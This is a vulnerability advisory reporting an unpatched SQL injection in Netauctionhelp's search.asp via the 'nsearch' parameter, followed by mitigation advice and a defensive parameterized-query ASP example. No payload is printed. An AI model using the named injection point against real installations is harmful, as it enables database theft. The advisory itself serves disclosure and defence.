Vendor: Netauctionhelp
By: Aria-Security.Net
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: Netauctionhelp
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Aria-Security Net
The PoC provided demonstrates the SQL injection vulnerability in the search.asp page. It allows an attacker to manipulate the SQL query and retrieve sensitive information from the database. The vulnerability can be exploited by appending malicious SQL statements to the 'nsearch' parameter.
Mitigation:
To mitigate this vulnerability, it is recommended to use parameterized queries or prepared statements to handle user input securely. Additionally, input validation and proper error handling should be implemented.
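The mitigation above, sketched for a classic ASP search page that reads the 'nsearch' parameter. This is an added example, not the vendor's code or a released patch. The table "items", its columns "id" and "title", the Application("ConnStr") connection string, the 64-character limit and the SQL Server style wildcard escaping are all assumptions.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit
' ADO constants, declared here so adovbs.inc is not required.
Const adCmdText = 1, adVarWChar = 202, adParamInput = 1
Const MAX_TERM = 64   ' assumed upper bound for a search term

Dim term, conn, cmd, rs
term = Trim(Request.QueryString("nsearch") & "")

' Input validation: reject empty or oversized terms before touching the database.
If Len(term) = 0 Or Len(term) > MAX_TERM Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Escape LIKE wildcards so [, % and _ in the term match literally
' (bracket escaping is SQL Server syntax; the backend is an assumption).
term = Replace(term, "[", "[[]")
term = Replace(term, "%", "[%]")
term = Replace(term, "_", "[_]")

On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")   ' hypothetical connection string

' Parameterized query: the term is bound as data and never concatenated into the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT id, title FROM items WHERE title LIKE ?"   ' hypothetical table
cmd.Parameters.Append cmd.CreateParameter("@term", adVarWChar, adParamInput, _
    MAX_TERM * 3 + 2, "%" & term & "%")
Set rs = cmd.Execute

' Error handling: return a generic message, never the raw database error text.
If Err.Number <> 0 Then
    Response.Status = "500 Internal Server Error"
    Response.Write "Search is temporarily unavailable."
    Response.End
End If
On Error GoTo 0

Do Until rs.EOF
    ' Encode on output so stored values cannot inject markup into the page.
    Response.Write "<li>" & Server.HTMLEncode(rs("title") & "") & "</li>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```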